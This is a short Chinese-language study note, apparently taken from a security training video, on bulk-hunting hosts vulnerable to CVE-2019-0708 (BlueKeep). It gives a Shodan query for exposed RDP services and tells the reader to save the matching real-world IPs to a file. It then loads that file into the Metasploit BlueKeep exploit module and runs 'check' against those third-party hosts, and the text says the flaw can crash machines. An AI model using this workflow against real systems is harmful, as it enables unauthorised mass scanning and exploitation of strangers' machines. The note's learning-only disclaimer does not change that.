聲明！
學(xué)習(xí)視頻來自B站up主 瀧羽sec 有興趣的師傅可以關(guān)注一下，如涉及侵權(quán)馬上刪除文章，筆記只是方便各位師傅的學(xué)習(xí)和探討，文章所提到的網(wǎng)站以及內(nèi)容，只做學(xué)習(xí)交流，其他均與本人以及瀧羽sec團隊無關(guān)，切勿觸碰法律底線，否則后果自負！！！！

批量查找CVE-2019-0708漏洞

簡述：

漏洞利用方式是通過遠程桌面端口3389，RDP協(xié)議進行攻擊的，導(dǎo)致機器藍屏癱瘓。

輸入命令：

shodan search --limit 10 --fields ip_str,port '"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"'

用16進制是因為shodan search vuln:cve -2019-0708 命令對于學(xué)術(shù)賬號無權(quán)限使用，需要注冊更高一級賬戶

查到ip和對應(yīng)端口后，通過 shodan host ip 來驗證是否存在該漏洞，如下所示，這個ip則存在CVE-2019-0708漏洞

掃描下來的ip可以放到文檔里（注意把端口刪掉），利用windows自帶遠程桌面連接嘗試連接

回到kali，輸入msfconsole，再輸入search 0708 查找此漏洞

輸入以下命令啟用這個模塊

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

輸入show options顯示選項

然后輸入 set rhosts file: 上述存放ip的文檔路徑

這里可以直接把文件托進命令面板

再輸入check檢查，帶* 號的不能利用，帶+號的可以利用

輸入show targets可以查看利用的版本

輸入exit退出